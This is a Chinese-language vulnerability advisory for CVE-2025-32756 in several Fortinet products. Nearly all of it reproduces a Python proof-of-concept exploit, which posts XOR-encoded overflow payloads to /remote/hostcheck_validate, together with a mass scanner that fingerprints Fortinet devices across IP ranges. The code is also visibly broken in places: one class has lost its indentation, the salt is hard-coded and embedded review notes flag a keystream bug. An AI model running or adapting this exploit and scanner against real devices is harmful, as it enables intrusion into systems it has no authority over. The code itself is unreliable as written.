0x00 前言
Fortinet FortiRecorder、FortiMail、FortiVoice等均为美国飞塔(Fortinet)公司的产品。其中,FortiRecorder是一套基于Web的网络视频录像机(NVR)管理系统;FortiMail是一套电子邮件安全网关产品;FortiVoice是一套统一通信与协作平台。
0x01 漏洞描述
受影响的Fortinet设备固件中,处理HTTP(S)请求的某个特定功能模块(可能与管理界面或特定API服务相关)未能正确校验输入数据的长度。当该模块接收到攻击者精心构造的、长度远超栈上预分配缓冲区的HTTP请求时,即发生栈溢出。
0x02 CVE编号
CVE-2025-32756
0x03 影响版本
FortiVoice
6.4.0-6.4.10、7.0.0-7.0.6、7.2.0
FortiMail
7.0.x、7.2.x、7.4.x、7.6.x
FortiNDR
1.x、7.0.x、7.2.x、7.4.x
FortiRecorder
6.4.x、7.0.x、7.2.x
FortiCamera
2.1.x
0x04 漏洞详情
POC:
https://github.com/kn0x0x/CVE-2025-32756-POC/
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-32756 - Fortinet Stack-Based Buffer Overflow
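This script demonstrates the vulnerability by sending specially crafted HTTP requests
(an XOR-encoded `enc` form parameter posted to /remote/hostcheck_validate) to potentially
vulnerable Fortinet devices. It also includes a scanner that fingerprints Fortinet web interfaces.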
WARNING: This script is for educational purposes only. Use only on systems you own or have permission to test.
Author: Kn0x Researcher
Date: June 2025
"""
import requests
import argparse
import sys
import hashlib
import base64
import urllib.parse
import ssl
import time
import socket
import ipaddress
import concurrent.futures
from urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning only. Every request in this script is
# made with certificate verification disabled (verify=False), which would
# otherwise emit this warning on each call.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Proof-of-concept driver for a single target. It builds two XOR-encoded "enc"
# payloads and POSTs them to /remote/hostcheck_validate over HTTPS with
# certificate verification disabled.
# NOTE(review): indentation was lost in this copy of the file; the statements
# below must be re-indented before the module will parse.
class FortinetExploit:
# Store the target coordinates and prepare a requests session.
#   target: host name or IP used to build the base URL
#   port:   TCP port of the HTTPS service (default 443)
#   debug:  when true, log() prints diagnostic messages
def __init__(self, target, port=443, debug=False):
self.target = target
self.port = port
self.debug = debug
self.base_url = f"https://{target}:{port}"
self.session = requests.Session()
# TLS certificates are not validated for any request made through this session.
self.session.verify = False
# Filled in by get_salt(); create_payload() calls get_salt() when this is unset.
self.salt = None
# Print a debug message, but only when the instance was created with debug=True.
def log(self, message):
if self.debug:
print(f"[DEBUG] {message}")
# Print an error message and terminate the process with exit status 1.
# sys.exit raises SystemExit, which is not an Exception subclass, so the
# `except Exception` handlers in the methods below do not intercept it.
def error(self, message):
print(f"[ERROR] {message}")
sys.exit(1)
# Request /remote/info and record a salt. Exits the process (via error()) on a
# non-200 status or on any request exception.
def get_salt(self):
"""Retrieve the salt from the server"""
try:
response = self.session.get(f"{self.base_url}/remote/info", timeout=10)
if response.status_code != 200:
self.error(f"Failed to get salt. Status code: {response.status_code}")
# Extract salt from response
# In a real exploit, we'd parse the response properly
# NOTE(review): the response body is never read; the salt is always the
# hard-coded placeholder below, whatever the server returned.
self.salt = "e0b638ac" # Example salt value
self.log(f"Retrieved salt: {self.salt}")
return self.salt
except Exception as e:
self.error(f"Error retrieving salt: {e}")
# Return the MD5 hex digest of salt + seed + a fixed constant string.
# Both arguments are expected to be str (they are concatenated, then encoded).
def compute_md5_state(self, salt, seed):
"""Compute the initial MD5 state from salt and seed"""
data = salt + seed + "GCC is the GNU Compiler Collection."
return hashlib.md5(data.encode()).hexdigest()
# Build a keystream as a hex string: repeatedly MD5 the raw bytes of the
# previous digest and append each 32-character hex digest until at least
# `length` hex characters exist, then truncate to exactly `length`.
def compute_keystream(self, initial_state, length):
"""Generate keystream from initial state"""
keystream = ""
current = initial_state
while len(keystream) < length:
current = hashlib.md5(bytes.fromhex(current)).hexdigest()
keystream += current
return keystream[:length]
# Assemble the request payload as a hex string:
#   seed + 2 XOR-encoded length bytes + XOR-encoded data bytes.
# Fetches the salt first if it has not been set yet.
def create_payload(self, seed, overflow_length):
"""Create an exploit payload with the given overflow length"""
if not self.salt:
self.get_salt()
# Initial state calculation
initial_state = self.compute_md5_state(self.salt, seed)
self.log(f"Initial state: {initial_state}")
# Create a payload that will cause buffer overflow
# The format is: seed + encrypted_length + encrypted_data
# For simplicity in this PoC, we're using a fixed pattern
# In a real exploit, we'd craft this more carefully
# Calculate the size that will trigger overflow
# We need to encode a size that, when decrypted, will be larger than the buffer
# Only the first 4 hex characters (2 bytes) of the keystream are kept here.
keystream_for_length = self.compute_keystream(initial_state, 32)[:4]
# XOR the desired overflow length with the keystream to get encrypted length
target_length = overflow_length
# Only the low 16 bits of the length are encoded, low byte first.
enc_length_bytes = bytes([
(target_length & 0xFF) ^ int(keystream_for_length[0:2], 16),
((target_length >> 8) & 0xFF) ^ int(keystream_for_length[2:4], 16)
])
enc_length_hex = enc_length_bytes.hex()
# Create payload data - in a real exploit this would be crafted to achieve RCE
# Here we just use a pattern to demonstrate the overflow
data = "A" * 64
# Encrypt the data
# NOTE(review): the keystream is generated with len(data) * 2 hex characters
# and then loses its first 6, so it is shorter than the 2 hex characters per
# data byte that the loop below consumes; the last iterations would slice an
# empty string and int('', 16) raises ValueError. Confirm the intended
# offset/length against the upstream PoC.
keystream_for_data = self.compute_keystream(initial_state, len(data) * 2)[6:]
encrypted_data = ""
for i in range(len(data)):
encrypted_data += format(ord(data[i]) ^ int(keystream_for_data[i*2:i*2+2], 16), '02x')
# Assemble the final payload
payload = seed + enc_length_hex + encrypted_data
self.log(f"Created payload with overflow length {overflow_length}")
return payload
# POST the payload as the form field "enc" to /remote/hostcheck_validate and
# return the requests response. Any request exception ends the process via error().
def send_exploit(self, payload):
"""Send the exploit payload to the target"""
try:
url = f"{self.base_url}/remote/hostcheck_validate"
# Percent-encode the payload because the body is assembled by hand below.
enc_param = urllib.parse.quote(payload)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
self.log(f"Sending payload to {url}")
response = self.session.post(
url,
data=f"enc={enc_param}",
headers=headers,
timeout=10
)
self.log(f"Response status: {response.status_code}")
self.log(f"Response headers: {response.headers}")
return response
except Exception as e:
self.error(f"Error sending exploit: {e}")
# Run the full sequence: fetch the salt, send two payloads built from the same
# seed (encoded lengths 4999 and 5000) one second apart, then report based on
# the second response.
def execute(self):
"""Execute the exploit"""
print(f"[*] Targeting {self.target}:{self.port}")
# Get salt from target
self.get_salt()
# Create a seed value - in a real exploit we'd calculate this more carefully
seed = "00690000"
print(f"[*] Using seed: {seed}")
# First request - set a byte to NULL
print("[*] Sending first payload to set up the overflow...")
payload1 = self.create_payload(seed, 4999)
self.send_exploit(payload1)
# Small delay between requests
time.sleep(1)
# Second request - set a specific byte to a controlled value
print("[*] Sending second payload to trigger the vulnerability...")
payload2 = self.create_payload(seed, 5000)
response = self.send_exploit(payload2)
# Check for signs of successful exploitation
# NOTE(review): success is inferred solely from an HTTP 200 status on the
# second request; nothing here verifies any effect on the target.
if response.status_code == 200:
print("[+] Exploit likely succeeded!")
print("[+] A vulnerable system would have the target byte modified")
print("[+] In a real attack, this could lead to remote code execution")
else:
print("[-] Exploit may have failed or target might not be vulnerable")
class FortinetScanner:
    """Probe hosts over HTTPS for Fortinet web interfaces.

    A host is reported when its TCP port accepts a connection and the page
    served at ``https://<ip>:<port>`` contains one of the device signature
    strings. Each reported host is additionally tagged "potentially
    vulnerable" when ``/remote/hostcheck_validate`` answers with anything
    other than HTTP 404. That is an endpoint-presence check only and is not
    proof that the host is affected by CVE-2025-32756.

    Certificate verification is disabled for every request.
    """

    _USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    # A page must contain at least one of these to count as a Fortinet device.
    # NOTE(review): a page that names only FortiMail / FortiNDR / FortiRecorder /
    # FortiCamera (and none of the strings below) is never reported - confirm
    # whether that is intended.
    _DEVICE_SIGNATURES = ("Fortinet", "FortiGate", "FortiVoice")
    # Checked in order; the first name found in the page becomes the product label.
    _PRODUCT_NAMES = (
        "FortiVoice",
        "FortiMail",
        "FortiNDR",
        "FortiRecorder",
        "FortiCamera",
    )
    _CSV_HEADER = "IP,Port,Product,Vulnerable\n"

    def __init__(self, debug=False):
        """Create a scanner; ``debug=True`` enables the messages printed by log()."""
        self.debug = debug

    def log(self, message):
        """Print *message* with a ``[DEBUG]`` prefix when debugging is enabled."""
        if self.debug:
            print(f"[DEBUG] {message}")

    def is_port_open(self, ip, port, timeout=2):
        """Return True if a TCP connection to ``(ip, port)`` succeeds.

        Any resolution, connection or argument error is treated as "closed"
        and yields False. The socket is always closed, even on error.
        """
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(timeout)
                return sock.connect_ex((str(ip), port)) == 0
        except (OSError, OverflowError, TypeError, ValueError) as e:
            # OSError covers resolver/socket failures; the others cover bad
            # port values or malformed host names.
            self.log(f"Error probing {ip}:{port}: {e}")
            return False

    def check_fortinet_device(self, ip, port=443):
        """Fingerprint one host.

        Returns a dict with keys ``ip``, ``port``, ``product`` and
        ``potentially_vulnerable`` when the host looks like a Fortinet
        device. Returns None when the port is closed, the page carries no
        signature, or the request fails.
        """
        if not self.is_port_open(ip, port):
            return None
        try:
            response = requests.get(
                f"https://{ip}:{port}",
                timeout=5,
                verify=False,
                headers={"User-Agent": self._USER_AGENT},
            )
            # Decode the body once instead of on every membership test.
            body = response.text
            if not any(signature in body for signature in self._DEVICE_SIGNATURES):
                return None
            product_type = next(
                (name for name in self._PRODUCT_NAMES if name in body),
                "Unknown Fortinet Device",
            )
            return {
                "ip": str(ip),
                "port": port,
                "product": product_type,
                "potentially_vulnerable": self.check_vulnerability(ip, port),
            }
        except Exception as e:
            # Best-effort probe: any failure means "not identified".
            self.log(f"Error checking {ip}: {e}")
            return None

    def check_vulnerability(self, ip, port=443):
        """Return True when ``/remote/hostcheck_validate`` does not answer 404.

        This only shows that the endpoint exists; it is not conclusive.
        Request failures are logged and reported as False.
        """
        try:
            response = requests.get(
                f"https://{ip}:{port}/remote/hostcheck_validate",
                timeout=5,
                verify=False,
                headers={"User-Agent": self._USER_AGENT},
            )
        except Exception as e:
            self.log(f"Error checking vulnerability on {ip}: {e}")
            return False
        return response.status_code != 404

    def _scan_targets(self, targets, total, port, threads):
        """Run check_fortinet_device over *targets* on a thread pool.

        Prints progress every 10 hosts and at the end, prints each hit, and
        returns the list of hit dicts in completion order.
        """
        results = []
        scanned = 0
        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
            future_to_ip = {
                executor.submit(self.check_fortinet_device, ip, port): ip
                for ip in targets
            }
            for future in concurrent.futures.as_completed(future_to_ip):
                scanned += 1
                if scanned % 10 == 0 or scanned == total:
                    print(f"[*] Progress: {scanned}/{total} IPs scanned ({(scanned/total)*100:.1f}%)")
                try:
                    result = future.result()
                except Exception as e:
                    # One failing host must not discard the hits found so far.
                    self.log(f"Error checking {future_to_ip[future]}: {e}")
                    continue
                if result:
                    print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
                    results.append(result)
        return results

    def _write_csv(self, output_file, results):
        """Write *results* to *output_file* as CSV with one header line."""
        try:
            with open(output_file, "w", encoding="utf-8") as f:
                f.write(self._CSV_HEADER)
                f.writelines(
                    f"{r['ip']},{r['port']},{r['product']},{r['potentially_vulnerable']}\n"
                    for r in results
                )
            print(f"[+] Results written to {output_file}")
        except OSError as e:
            print(f"[ERROR] Failed to write to output file: {e}")

    def scan_network(self, target_range, port=443, threads=10):
        """Scan every address of a CIDR range.

        *target_range* is parsed with ``ipaddress.ip_network``. Returns the
        list of hit dicts, or ``[]`` if the range is invalid or the scan
        cannot be started.
        """
        try:
            network = ipaddress.ip_network(target_range)
            print(f"[*] Starting scan of {network} on port {port}")
            print(f"[*] Using {threads} threads")
            return self._scan_targets(network, network.num_addresses, port, threads)
        except Exception as e:
            # Top-level boundary of the scan: report and return no results.
            print(f"[ERROR] Error scanning network: {e}")
            return []

    def scan_multiple_ips(self, ip_list, port=443, threads=10, output_file=None):
        """Scan an explicit list of addresses.

        When *output_file* is given and at least one device was found, the
        hits are also written to that file as CSV. Returns the list of hit
        dicts, or ``[]`` if the scan cannot be started.
        """
        try:
            print(f"[*] Starting scan of {len(ip_list)} IPs on port {port}")
            print(f"[*] Using {threads} threads")
            results = self._scan_targets(ip_list, len(ip_list), port, threads)
            if output_file and results:
                self._write_csv(output_file, results)
            return results
        except Exception as e:
            # Top-level boundary of the scan: report and return no results.
            print(f"[ERROR] Error scanning IPs: {e}")
            return []
def load_ips_from_file(filename):
    """Read target addresses from a text file, one per line.

    Surrounding whitespace is stripped from every line and lines that are
    empty after stripping are skipped. The number of loaded entries is
    printed. If the file cannot be read, an error is printed and the process
    exits with status 1.
    """
    try:
        addresses = []
        with open(filename, 'r') as handle:
            for raw_line in handle:
                entry = raw_line.strip()
                if entry:
                    addresses.append(entry)
        print(f"[*] Loaded {len(addresses)} IP addresses from {filename}")
        return addresses
    except Exception as exc:
        print(f"[ERROR] Failed to load IP addresses from {filename}: {exc}")
        sys.exit(1)
def _write_results_csv(path, results):
    """Write scan hits to *path* as CSV: one header line, then one line per hit.

    Each item of *results* is a dict with the keys ``ip``, ``port``,
    ``product`` and ``potentially_vulnerable``. I/O failures are reported on
    stdout rather than raised.
    """
    try:
        with open(path, "w", encoding="utf-8") as f:
            f.write("IP,Port,Product,Vulnerable\n")
            f.writelines(
                f"{r['ip']},{r['port']},{r['product']},{r['potentially_vulnerable']}\n"
                for r in results
            )
        print(f"[+] Results written to {path}")
    except OSError as e:
        print(f"[ERROR] Failed to write to output file: {e}")


def main():
    """Command-line entry point.

    Sub-commands:
      exploit TARGET [-p PORT] [-d]
          Run FortinetExploit against a single target.
      scan (-f IP | -u FILE | --range CIDR) [-p PORT] [-t THREADS] [-o CSV] [-d]
          Fingerprint one host, a list of hosts read from a file, or a CIDR range.

    With no sub-command, the banner and the help text are printed.
    """
    parser = argparse.ArgumentParser(description="CVE-2025-32756 Fortinet Buffer Overflow PoC")
    subparsers = parser.add_subparsers(dest="command", help="Command to run")

    # Exploit command
    exploit_parser = subparsers.add_parser("exploit", help="Exploit a single target")
    exploit_parser.add_argument("target", help="Target IP or hostname")
    exploit_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
    exploit_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")

    # Scan command; exactly one of the three target selectors is required.
    scan_parser = subparsers.add_parser("scan", help="Scan for vulnerable devices")
    scan_group = scan_parser.add_mutually_exclusive_group(required=True)
    scan_group.add_argument("-f", "--ip", help="Single IP to scan")
    scan_group.add_argument("-u", "--file", help="File containing list of IPs to scan (one per line)")
    scan_group.add_argument("--range", help="IP range to scan (CIDR notation, e.g., 192.168.1.0/24)")
    scan_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
    scan_parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads (default: 10)")
    scan_parser.add_argument("-o", "--output", help="Output file to save results (CSV format)")
    scan_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")

    args = parser.parse_args()

    print("CVE-2025-32756 Fortinet Buffer Overflow PoC")
    print("WARNING: This is for educational purposes only!")
    print("Use only against systems you own or have permission to test.")
    print("=" * 60)

    if args.command == "exploit":
        exploit = FortinetExploit(args.target, args.port, args.debug)
        exploit.execute()
    elif args.command == "scan":
        scanner = FortinetScanner(args.debug)
        if args.ip:
            # Scan a single IP
            print(f"[*] Scanning single IP: {args.ip}")
            result = scanner.check_fortinet_device(args.ip, args.port)
            if result:
                print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
                if args.output:
                    _write_results_csv(args.output, [result])
            else:
                print(f"[-] No Fortinet device found at {args.ip}:{args.port} or it's not vulnerable")
        elif args.file:
            # Scan multiple IPs from file; the scanner writes the CSV itself here.
            ip_list = load_ips_from_file(args.file)
            scanner.scan_multiple_ips(ip_list, args.port, args.threads, args.output)
        elif args.range:
            # Scan IP range (CIDR)
            results = scanner.scan_network(args.range, args.port, args.threads)
            if args.output and results:
                _write_results_csv(args.output, results)
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
0x05 参考链接
https://github.com/kn0x0x/CVE-2025-32756-POC/
https://www.fortiguard.com/psirt/FG-IR-25-254
原文始发于微信公众号(信安百科):CVE-2025-32756|Fortinet多款产品存在远程代码执行漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论